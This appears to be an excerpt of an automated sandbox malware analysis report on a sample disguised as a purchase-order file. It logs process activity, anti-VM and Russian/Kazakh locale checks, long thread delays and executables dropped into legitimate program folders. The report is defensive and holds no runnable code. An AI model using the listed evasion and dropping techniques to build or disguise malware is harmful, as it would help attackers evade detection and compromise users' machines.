                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: RFQ_PO N89397-GM7287-Order.bat.exe PID: 7316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: YRtQgzFlDnVSru.exe PID: 2648, type: MEMORYSTR
                  Contains functionality to behave differently if execute on a Russian/Kazak computer
                  Source: C:\Windows\System32\AppVClient.exeCode function: 15_2_00B652A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 15_2_00B652A0
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 17_2_004252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 17_2_004252A0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_008952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 18_2_008952A0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00D152A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 19_2_00D152A0
                  Source: C:\Windows\System32\msdtc.exeCode function: 20_2_005552A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 20_2_005552A0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B152A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 21_2_00B152A0
                  Source: C:\Windows\System32\Locator.exeCode function: 24_2_004C52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 24_2_004C52A0
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 25_2_006C52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 25_2_006C52A0
                  Source: C:\Windows\System32\snmptrap.exeCode function: 26_2_006852A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 26_2_006852A0
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_005252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 27_2_005252A0
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_004E52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 28_2_004E52A0
                  Source: C:\Windows\System32\TieringEngineService.exeCode function: 30_2_007D52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 30_2_007D52A0
                  Source: C:\Windows\System32\AgentService.exeCode function: 31_2_00BC52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 31_2_00BC52A0
                  Source: C:\Windows\System32\vds.exeCode function: 33_2_00B752A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 33_2_00B752A0
                  Source: C:\Windows\System32\wbengine.exeCode function: 35_2_00AF52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 35_2_00AF52A0
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory allocated: 3220000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory allocated: 5220000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory allocated: 58E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory allocated: 68E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory allocated: 6A10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory allocated: 7A10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory allocated: B920000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory allocated: C920000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory allocated: CDB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeMemory allocated: DDB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 7500000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 7770000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 75B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMemory allocated: 840000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMemory allocated: 2680000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMemory allocated: 23B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMemory allocated: 4BF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMemory allocated: 5BF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMemory allocated: 5D20000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMemory allocated: 6D20000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMemory allocated: ABE0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeMemory allocated: BBE0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 74B0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 7740000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMemory allocated: 74F0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_004A95E4 rdtsc 9_2_004A95E4
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4098Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4351Jump to behavior
                  Source: C:\Windows\System32\msdtc.exeWindow / User API: threadDelayed 469
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 1856
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 8110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeDropped PE file which has not been started: C:\Windows\System32\msiexec.exeJump to dropped file
